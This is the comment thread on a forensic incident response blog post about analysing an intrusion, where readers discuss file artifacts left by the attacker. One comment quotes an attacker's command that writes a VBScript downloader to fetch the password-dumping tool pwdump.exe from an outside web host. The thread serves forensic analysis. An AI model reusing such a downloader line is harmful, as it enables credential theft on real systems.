Comments on Forensic Incident Response: Analyzing an intrusion Part II - Corporal and Environmental
Author: hogfly
Updated: 2023-04-02T10:17:04.631-04:00

Anonymous, 2007-04-30T00:17:00.000-04:00:
Excellent Research! Please keep writing

hogfly, 2007-04-29T15:24:00.000-04:00:
Harlan,
Thanks for the link. I'd already known that the file would exist in temporary internet files - and hinted at it (I was saving that for the next entry), but Robert's write up was definitely a good find!
Thanks for pointing me to it.

H. Carvey, 2007-04-29T07:29:00.000-04:00:
echo xPost.Open "GET","http://www.dit.net/images/pwdump.exe",0 >>get.vbs

One thing to point out here regarding artifacts...

Robert Hensing has a great write-up (http://blogs.technet.com/robert_hensing/archive/2006/11/15/ever-found-malware-hiding-in-the-all-users-profile-on-windows-ever-wonder-how-it-got-there-or-why-it-was-there.aspx) on what